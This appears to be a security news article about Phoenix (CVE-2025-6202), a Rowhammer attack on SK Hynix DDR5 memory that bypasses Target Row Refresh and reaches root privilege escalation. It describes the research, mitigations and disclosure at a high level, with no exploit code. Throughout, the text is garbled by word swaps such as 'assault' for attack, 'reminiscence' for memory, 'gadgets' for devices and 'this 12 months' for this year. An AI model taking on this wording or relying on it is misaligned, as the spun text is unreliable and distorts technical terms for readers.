A bunch of safety researchers from the ETH Zurich college and Google have demonstrated a sensible Rowhammer assault in opposition to DDR5.
Dubbed Phoenix and tracked as CVE-2025-6202, the DDR5 Rowhammer assault was discovered to be efficient in opposition to 15 gadgets from SK Hynix, the most important DRAM producer.
As a part of a Rowhammer assault, a DRAM reminiscence row is accessed repeatedly to trigger electrical interference resulting in bit flips in adjoining areas. This might result in elevation of privileges, information corruption, information leakage, and in breaking reminiscence isolation in digital environments.
After greater than a decade of identified Rowhammer assaults focusing on CPUs and CPU-based reminiscence, a gaggle of College of Toronto researchers this 12 months demonstrated that such assaults are doable and sensible in opposition to GPUs as properly.
The newly devised Phoenix assault exhibits that, regardless of its extra subtle in-DRAM Goal Row Refresh (TRR) mechanisms meant to forestall Rowhammer assaults, DDR5 too is weak.
To show that, 4 ETH Zurich teachers and two Google researchers reverse-engineered the TRR schemes in DDR5, discovering {that a} profitable assault must “exactly observe hundreds of refresh operations”.
Of their paper (PDF), the researchers clarify that the protections DDR5 comes with require considerably longer Rowhammer patterns to be bypassed, and that these patterns want to stay in-sync with hundreds of refresh instructions.
Phoenix, nonetheless, was designed to resynchronize the sample when missed refresh operations are detected, thus triggering bit flips that allowed the researchers to create a privilege escalation exploit and acquire root on a commodity DDR5 system with default settings.Commercial. Scroll to proceed studying.
“We consider Phoenix on 15 DDR5 DIMMs from SK Hynix and present that it will possibly set off bit flips on all of them. We additionally exhibit that the bit flips are exploitable by constructing the primary Rowhammer privilege escalation exploit operating in default settings on a PC in as little as 109 seconds,” the researchers observe.
The researchers say they restricted their work to SK Hynix gadgets because of the intensive effort of reverse engineering the carried out mitigations, and level out that DDR5 gadgets from different producers shouldn’t be thought of protected in opposition to Rowhammer assaults.
Tripling the refresh charge, the researchers say, prevents Phoenix from triggering bit flips, however incurs an overhead of 8.4%. Extra principled mitigations, similar to per-row activation counters, ought to cease Rowhammer assaults utterly, they are saying.
Phoenix was disclosed to SK Hynix, CPU distributors, and main cloud suppliers in early June. Final week, AMD launched BIOS updates to deal with CVE-2025-6202 in shopper machines, the researchers observe.
Associated: VMScape: Lecturers Break Cloud Isolation With New Spectre Assault
Associated: AI Techniques Weak to Immediate Injection by way of Picture Scaling Assault
Associated: Hybrid Networks Require an Built-in On-prem and Cloud Safety Technique
Associated: Webcast Video: Rethinking Endpoint Hardening for Right this moment’s Assault Panorama
